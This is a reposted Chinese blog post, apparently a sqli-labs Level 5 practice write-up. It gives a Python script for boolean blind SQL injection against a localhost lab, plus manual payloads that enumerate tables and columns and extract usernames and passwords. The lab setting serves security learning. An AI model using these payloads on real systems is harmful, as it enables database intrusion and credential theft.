碼上快樂

相關內容    簡體    繁體

sqli-labs第5關布爾盲注pyhton腳本

本文轉載自   查看原文   2019-04-03 14:53   571    python 
import requests
import os

#此函數先判斷數據庫長度
def length(url,str):
	num = 1
	while True:
		str_num = '%d' %num
		len_url = url + "' and (select length(database()) = " + str_num +")--+"
		response = requests.get(len_url)
		if str in response.text:
			print("數據庫長度為:%s" %str_num)
			content(url,str,num)
			break
		else:
			num = num + 1

#此函數判斷字符串具體的內容
def content(url,str,num):
	s = ['1','2','3','4','5','6','7','8','9','0','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']
	con_num = 1
	while con_num <= num:
		str_num = '%d' %con_num
		for i in s:
			con_url = url + "' and (select mid(database(),"+ str_num +",1)='"+ i +"')--+"
			response = requests.get(con_url)
			if str in response.text:
				fwrite(i)
		con_num = con_num + 1
#此函數對字符串的內容做記錄並輸出
def fwrite(i):
	fp = open("cache.txt",'a')
	fp.write(i)
	fp.close()
if __name__ == '__main__':
	url = "http://localhost/sqli-labs/Less-5/?id=1"
	response = requests.get(url)
	str = "You are in..........."
	if str in response.text:
		length(url,str)
	else:
		print("請輸入正確的地址")

  初學python,只注重實現功能,不要太在意某些細節,如有建議,感謝提出。

  

#庫中有幾個表:

1' and ((select count(table_name) from information_schema.tables where table_schema = 'security') = 4)--+

#測表名長度:

1' and (select length((select table_name from information_schema.tables where table_schema = 'security' limit 0,1)) = 10)--+

#爆表名:

1' and (select mid((select table_name from information_schema.tables where table_schema = 'security' limit 0,1),1,1)='a')--+

#表中有幾列:

1' and ((select count(column_name) from information_schema.columns where table_name = 'users' and table_schema = 'security') = 3)--+

#測列名長度:

1' and (select length((select column_name from information_schema.columns where table_name = 'users' and table_schema = 'security' limit 1,1)) = 8)--+

#爆列名:

1' and (select mid((select column_name from information_schema.columns where table_name = 'users' and table_schema = 'security' limit 1,1),1,1)='u')--+

#爆用戶名:

1' and (select mid((select username from security.users limit 0,1),1,1)='d')--+

#爆密碼:

1' and (select mid((select password from security.users limit 0,1),1,1)='d')--+

 以上標紅的就是需要遞歸測試的地方(標紅的地方不顯示-.-!,將就看),需要者可自行修改代碼。還有上述代碼中 s 列表請針對具體的情況修改,因為沒有特殊字符以及大寫字母等。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 sqli-labs(7-8關) sqli-labs闖關之1-10關 sqli-labs第二關 詳解 sqli-labs通關教程----1~10關 sqli-labs闖關之21-30關 sqli-labs第一關 詳解 sqli-labs通關教程----11~20關 sqli-labs(38) sqli-labs(17) sqli-labs(26)
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM